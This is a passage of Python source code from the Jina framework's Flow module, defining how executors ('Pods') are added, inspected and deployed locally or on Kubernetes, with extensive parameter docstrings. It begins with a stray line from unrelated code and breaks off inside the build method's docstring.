self.lines.close[0] = float(msg['mid']['c'])
return True
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__, helper
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import Pod
from ..peapods.pods.factory import PodFactory
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
# Wait for namespace being actually deleted
while True:
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
break
else:
time.sleep(1.0)
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after_address: The address of the uses-before runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_connection_pool = kwargs.get('k8s_connection_pool', True)
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.k8s_namespace or self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
else:
self.k8s_connection_pool = False
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.k8s_namespace or self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.k8s_namespace or self.args.name
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
if not self.args.infrastructure == InfrastructureType.K8S:
args.k8s_connection_pool = False
else:
args.k8s_connection_pool = self.k8s_connection_pool
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
if self.args.infrastructure == InfrastructureType.K8S:
if self.k8s_connection_pool:
return {}
else:
# build graph dict
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
from jina.peapods.networking import K8sGrpcConnectionPool
pod_k8s_address = (
f'{v.name}-head.{self.args.k8s_namespace or self.args.name}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
else:
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.host}:{v.head_port_in}']
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param peas_hosts: The hosts of the peas when shards greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-before runtime
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.k8s_namespace or self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
if not self.args.infrastructure == InfrastructureType.K8S:
args.k8s_connection_pool = False
else:
# TODO: this should not be necessary, but the boolean flag handling in the parser is not able to handle this
args.k8s_connection_pool = kwargs.get(
'k8s_connection_pool', self.k8s_connection_pool
)
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
